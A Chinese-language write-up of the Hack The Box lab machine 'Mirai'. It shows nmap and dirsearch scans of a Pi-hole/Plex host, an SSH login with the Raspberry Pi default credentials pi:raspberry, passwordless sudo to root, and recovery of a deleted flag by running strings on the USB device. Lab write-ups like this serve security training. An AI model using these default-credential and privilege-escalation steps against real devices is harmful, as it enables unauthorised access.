美文网首页
【HTB】Mirai(Pi-hole)

【HTB】Mirai(Pi-hole)

作者: 天线锅仔 | 来源:发表于2021-12-12 00:41 被阅读0次

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务探测

┌──(root💀kali)-[~/htb/Mirai]
└─# nmap -Pn -sV 10.10.10.48 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-11 07:58 EST
Nmap scan report for 10.10.10.48
Host is up (0.31s latency).                                                                                                                                                                                         
Not shown: 65529 closed ports                                                                                                                                                                                       
PORT      STATE SERVICE VERSION                                                                                                                                                                                     
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)                                                                                                                                                
53/tcp    open  domain  dnsmasq 2.76                                                                                                                                                                                
80/tcp    open  http    lighttpd 1.4.35                                                                                                                                                                             
1935/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)                                                                                                                                              
32400/tcp open  http    Plex Media Server httpd                                                                                                                                                                     
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口有一个cms的登录页面
cms名称: Pi-hole
版本: Pi-hole Version v3.1.4 Web Interface Version v3.1 FTL Version v2.10

32400端口也有一个cms页面
cms名称:Plex
版本:Version 3.9.1

80端口目录爆破

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48/admin                                                                                                                         

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                             
                                                                                                                                                                                                                    
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.48/-admin_21-12-11_08-21-32.txt

Error Log: /root/dirsearch/logs/errors-21-12-11_08-21-32.log

Target: http://10.10.10.48/admin/

[08:21:33] Starting: 
[08:21:42] 301 -    0B  - /admin/.git  ->  http://10.10.10.48/admin/.git/  
[08:21:42] 200 -  274B  - /admin/.git/config                               
[08:21:42] 200 -   73B  - /admin/.git/description                          
[08:21:42] 200 -   23B  - /admin/.git/HEAD                                 
[08:21:42] 200 -  240B  - /admin/.git/info/exclude                         
[08:21:42] 200 -  182B  - /admin/.git/logs/HEAD                            
[08:21:42] 200 -  182B  - /admin/.git/logs/refs/heads/master               
[08:21:42] 301 -    0B  - /admin/.git/logs/refs/heads  ->  http://10.10.10.48/admin/.git/logs/refs/heads/
[08:21:42] 200 -  182B  - /admin/.git/logs/refs/remotes/origin/HEAD        
[08:21:42] 301 -    0B  - /admin/.git/logs/refs  ->  http://10.10.10.48/admin/.git/logs/refs/
[08:21:42] 301 -    0B  - /admin/.git/logs/refs/remotes/origin  ->  http://10.10.10.48/admin/.git/logs/refs/remotes/origin/
[08:21:42] 301 -    0B  - /admin/.git/refs/heads  ->  http://10.10.10.48/admin/.git/refs/heads/
[08:21:42] 301 -    0B  - /admin/.git/refs/remotes/origin  ->  http://10.10.10.48/admin/.git/refs/remotes/origin/
[08:21:42] 301 -    0B  - /admin/.git/logs/refs/remotes  ->  http://10.10.10.48/admin/.git/logs/refs/remotes/
[08:21:42] 301 -    0B  - /admin/.git/refs/remotes  ->  http://10.10.10.48/admin/.git/refs/remotes/
[08:21:42] 200 -   32B  - /admin/.git/refs/remotes/origin/HEAD
[08:21:42] 200 -   41B  - /admin/.git/refs/heads/master
[08:21:42] 200 -   11KB - /admin/.git/index                                
[08:21:42] 301 -    0B  - /admin/.git/refs/tags  ->  http://10.10.10.48/admin/.git/refs/tags/
[08:21:42] 200 -    1KB - /admin/.github/ISSUE_TEMPLATE.md                 
[08:21:42] 200 -    1KB - /admin/.github/PULL_REQUEST_TEMPLATE.md          
[08:21:42] 200 -  153B  - /admin/.gitignore/                               
[08:21:43] 200 -  107B  - /admin/.git/packed-refs                          
[08:21:43] 200 -  153B  - /admin/.gitignore                                
[08:21:44] 200 -  648B  - /admin/.pullapprove.yml                          
[08:21:48] 200 -  846B  - /admin/CONTRIBUTING.md                            
[08:21:49] 200 -    2KB - /admin/README.md                                  
[08:21:49] 200 -   14KB - /admin/LICENSE                                    
[08:22:12] 200 -  186B  - /admin/api.php                                    
[08:22:24] 200 -   14KB - /admin/debug.php                                  
[08:22:35] 301 -    0B  - /admin/img  ->  http://10.10.10.48/admin/img/     
[08:22:36] 200 -   14KB - /admin/index.php                                  
[08:22:36] 200 -   14KB - /admin/index.php/login/                           
[08:23:01] 301 -    0B  - /admin/scripts  ->  http://10.10.10.48/admin/scripts/
[08:23:02] 200 -   14KB - /admin/settings.php                               
[08:23:07] 301 -    0B  - /admin/style  ->  http://10.10.10.48/admin/style/ 

32400端口目录爆破

──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48:32400/web

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                             
                                                                                                                                                                                                                    
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.48-32400/-web_21-12-11_09-55-31.txt

Error Log: /root/dirsearch/logs/errors-21-12-11_09-55-31.log

Target: http://10.10.10.48:32400/web/

[09:55:33] Starting:    
[09:55:40] 200 -    0B  - /web/js                                                             
[09:56:15] 200 -    0B  - /web/common                                       
[09:56:15] 200 -    0B  - /web/common/                                      
[09:56:20] 200 -    0B  - /web/desktop/                                                                
[09:56:25] 200 -    5KB - /web/favicon.ico                                  
[09:56:30] 200 -    0B  - /web/img                                                          
[09:56:32] 200 -    4KB - /web/index.html                                   
[09:56:32] 200 -    0B  - /web/js/                                                    
[09:57:04] 200 -    0B  - /web/swf   

初始shell

经过一番谷歌搜索和研究,Pi-hole是一个轻量级的广告拦截器,一般安装在树莓派上。

也就是说,靶机很可能是一个树莓派机器

而树莓派的默认ssh密码是:pi:raspberry

尝试登陆

┌──(root💀kali)-[~/htb/Mirai]
└─# ssh pi@10.10.10.48     
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)

成功登陆!

提权

查看sudo特权

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

可以直接提权到root,找到user.txt

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# find / -name user.txt
/home/pi/Desktop/user.txt

root.txt在U盘有备份

root@raspberrypi:/home/pi# find / -name root.txt
/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

列出设备信息

root@raspberrypi:/media# lsblk
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0   10G  0 disk 
├─sda1   8:1    0  1.3G  0 part /lib/live/mount/persistence/sda1
└─sda2   8:2    0  8.7G  0 part /lib/live/mount/persistence/sda2
sdb      8:16   0   10M  0 disk /media/usbstick
sr0     11:0    1 1024M  0 rom  
loop0    7:0    0  1.2G  1 loop /lib/live/mount/rootfs/filesystem.squashfs


貌似是在

sdb 8:16 0 10M 0 disk /media/usbstick

查看

root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

还是要耍点花样。

查看/dev/sdb,原来是一个二进制文件

root@raspberrypi:/media/usbstick# ls -alh /dev/sdb
brw-rw---- 1 root disk 8, 16 Dec 11 12:53 /dev/sdb

直接用strings命令查看/dev/sdb

root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
{root.txt在此}
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

总结

这台靶机的重点,主要是根据扫描出来的服务,理解搭建这些服务的用意,进而理解这个服务一般是运行在什么系统上。当得知是树莓派以后,使用树莓派的默认登录账号连到ssh,拿到初始shell。

相关文章

  • 【HTB】Mirai(Pi-hole)

    免责声明 本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任...

  • Mirai源码解析

    Mirai概述 mirai,2016年一个备受关注的DDoS攻击程序,与传统的僵尸网络不同的是,mirai的控制的...

  • Kuriyama Mirai's Stones

    Kuriyama Mirai's Stones Kuriyama Mi...

  • Bank(Clear Text Credentials,SUID

    开放端口 详细端口信息 DNS 首先按照htb的习惯,我们假定靶机的域名是bank.htb,依此执行Zone Tr...

  • Pi-hole安装

    下载 git clone https://github.com/pi-hole/pi-hole.git 安装 进入...

  • edge 一直同步

    问题可能出在你使用的DNS过滤程序(例如AdGuard、AdGuard Home、Pi-Hole等),这些DNS过...

  • MIRAI中文填词

    绚烂的世界 你占据我全部 花开的季节 少了你微笑的脸 岁月不停更迭 抹不去对你思念 无数交错的梦境 你是否...

  • 多图插入的free style实现

    \begin{figure}[htb]\centering %该句也可以删,确保居中\subfloat{\incl...

  • 0x00-HackTheBox-GetInviteCode

    Check out my video!!! - 0x00-HTB-GetInviteCode My input m...

  • htb optimistic

    这道题考察两个知识点: 1。int与unsigned int比较,用负数跳过比较,实现大量输入。 2。输入变相限制...

网友评论

      本文标题:【HTB】Mirai(Pi-hole)

      本文链接:https://www.haomeiwen.com/subject/syolfrtx.html